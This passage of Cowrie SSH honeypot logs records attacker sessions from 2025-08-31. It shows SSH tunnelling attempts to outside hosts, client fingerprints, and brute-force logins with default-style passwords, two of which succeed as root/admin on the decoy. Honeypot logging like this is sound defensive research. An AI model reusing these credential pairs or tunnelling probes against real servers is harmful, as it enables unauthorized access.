x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":0,"message":"discarded direct-tcp forward request 0 to 52.208.26.198:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xdfO\\x8e\\xd4\\x864\\xdc\\xd6\\x1b\\xcbr\\xc5\\x86\\x9fs\\x96Vk\\xbe\\xa8\\xb7\\t\\xb7\\xee\\xaa2B\\xa9*^\\xd3\\xc1 \\xca\\xeeiC\\x03\\xa9\\xf4N\\xb4~\\xfb\\xc8Z\\xce+\\x04b Q>\\xaf\\xc3\\xedM\\xfa5\\xec\\xdb\\xeed\\x98\\xe8\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x1a\\x00\\x18\\x00\\x00\\x15checkip.amazonaws.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 \\xe578\\t\\xb3\\x98 \\x9d\\xa5Q\\x85\\x1bG!\\x99\\x96U\\x06J*:SP\\xb5\\x08\\x95\\xd4\\x8b\\x06\\x9b\\x96\\x03\\x00\\x15\\x00\\xa1\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:59:19.009864Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"23.58.105.51","dst_port":443,"src_ip":"212.227.125.160","src_port":56226,"message":"direct-tcp connection request to 23.58.105.51:443 from 127.0.0.1:56226","sensor":"my-vps","timestamp":"2025-08-31T08:59:19.245184Z","session":"c37996a36252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"23.58.105.51","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03)z\\xc9\\xbcu\\x88\\xc6\\x87 \\xf9\\x06C\\xc5d\\x88Y\\x0b\\x88\\x0fE\\xfd\\x0c\\xf1S~\\xa4\\x8e\\xe7\\xcfW\\x81\\x18 MYR\\x9b\\xf6\\n=k\\x847\\x90\\xd4\\xc46=n!\\xa2\\xf1!\\xa7\\x10\\xc6\\xf2\\xf8N\\xa5\\xa6\\xa5m\\x0e\\x1a\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 =\\x8bR\\xc86\\xf0a(\\xfa\\xcb\\xe4c\\x1e\\x81E<\\xa0\\nI\\xa3\\xfb\\xc5\"\\xb2\\x8c\\xf8\\x83--\\xbf\\xd3j\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":1,"message":"discarded direct-tcp forward request 1 to 23.58.105.51:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03)z\\xc9\\xbcu\\x88\\xc6\\x87 \\xf9\\x06C\\xc5d\\x88Y\\x0b\\x88\\x0fE\\xfd\\x0c\\xf1S~\\xa4\\x8e\\xe7\\xcfW\\x81\\x18 MYR\\x9b\\xf6\\n=k\\x847\\x90\\xd4\\xc46=n!\\xa2\\xf1!\\xa7\\x10\\xc6\\xf2\\xf8N\\xa5\\xa6\\xa5m\\x0e\\x1a\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x12\\x00\\x10\\x00\\x00\\rwww.apple.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 =\\x8bR\\xc86\\xf0a(\\xfa\\xcb\\xe4c\\x1e\\x81E<\\xa0\\nI\\xa3\\xfb\\xc5\"\\xb2\\x8c\\xf8\\x83--\\xbf\\xd3j\\x00\\x15\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-31T08:59:19.382505Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.179.132","dst_port":443,"src_ip":"212.227.125.160","src_port":56450,"message":"direct-tcp connection request to 142.250.179.132:443 from 127.0.0.1:56450","sensor":"my-vps","timestamp":"2025-08-31T08:59:20.125660Z","session":"c37996a36252"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.179.132","dst_port":443,"data":"b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xad\\xdf\\xcdi\\x83\\x00\\x93\\xff\\xfd \\x8a\\xd2[f\\x0c\\xa5\\xa9\\xaa-L\\xe8\\xed*iT\\xf5\\t\\x03%rfi \\xa2\\xfbl\\xees\\xa5\\xc2<b\\xde\\xc8N\\xa4\\xa4\\x1d\\x95\\xf2\\x1c\\xed\\x05\\x1c\\xe4s\\xf1O\\xf7\\x8cl\\x83\\x18\\x02\\xc0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 J\\x1a\\xcb\\xccL8\\xa8\\xd1\\x83.\\x97e\\x1f\\xdah\\x15\\x15|\\xc6\\x0cI\\x10\\xe9zEa\\x96I\\x19\\x91\\xban\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","id":2,"message":"discarded direct-tcp forward request 2 to 142.250.179.132:443 with data b\"\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\xad\\xdf\\xcdi\\x83\\x00\\x93\\xff\\xfd \\x8a\\xd2[f\\x0c\\xa5\\xa9\\xaa-L\\xe8\\xed*iT\\xf5\\t\\x03%rfi \\xa2\\xfbl\\xees\\xa5\\xc2<b\\xde\\xc8N\\xa4\\xa4\\x1d\\x95\\xf2\\x1c\\xed\\x05\\x1c\\xe4s\\xf1O\\xf7\\x8cl\\x83\\x18\\x02\\xc0\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 J\\x1a\\xcb\\xccL8\\xa8\\xd1\\x83.\\x97e\\x1f\\xdah\\x15\\x15|\\xc6\\x0cI\\x10\\xe9zEa\\x96I\\x19\\x91\\xban\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-31T08:59:21.116432Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:59:21.231936Z","src_ip":"212.227.125.160","session":"c37996a36252"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":48736,"dst_ip":"1.2.3.4","dst_port":22,"session":"fce5b4d1bb85","protocol":"ssh","message":"New connection: 80.94.95.15:48736 (1.2.3.4:22) [session: fce5b4d1bb85]","sensor":"my-vps","timestamp":"2025-08-31T08:59:28.522115Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T08:59:28.523384Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T08:59:28.578036Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admins","message":"login attempt [admin/admins] failed","sensor":"my-vps","timestamp":"2025-08-31T08:59:28.864658Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T08:59:29.918544Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-08-31T08:59:30.972950Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"7ujMko0admin","message":"login attempt [admin/7ujMko0admin] failed","sensor":"my-vps","timestamp":"2025-08-31T08:59:32.031088Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Admin@1234","message":"login attempt [admin/Admin@1234] failed","sensor":"my-vps","timestamp":"2025-08-31T08:59:33.087037Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T08:59:34.140567Z","src_ip":"80.94.95.15","session":"fce5b4d1bb85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46792,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f264c568782","protocol":"ssh","message":"New connection: 212.227.125.160:46792 (1.2.3.4:22) [session: 9f264c568782]","sensor":"my-vps","timestamp":"2025-08-31T09:00:02.704195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-08-31T09:00:02.734487Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46794,"dst_ip":"1.2.3.4","dst_port":22,"session":"8458ef53750b","protocol":"ssh","message":"New connection: 212.227.125.160:46794 (1.2.3.4:22) [session: 8458ef53750b]","sensor":"my-vps","timestamp":"2025-08-31T09:00:02.823523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.8","message":"Remote SSH version: SSH-2.0-libssh_0.9.8","sensor":"my-vps","timestamp":"2025-08-31T09:00:02.826015Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-08-31T09:00:03.017915Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.client.kex","hassh":"3335afa7a75e84f8348f05c623c5ecf9","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 3335afa7a75e84f8348f05c623c5ecf9","sensor":"my-vps","timestamp":"2025-08-31T09:00:03.054128Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T09:00:04.594734Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T09:00:05.025860Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
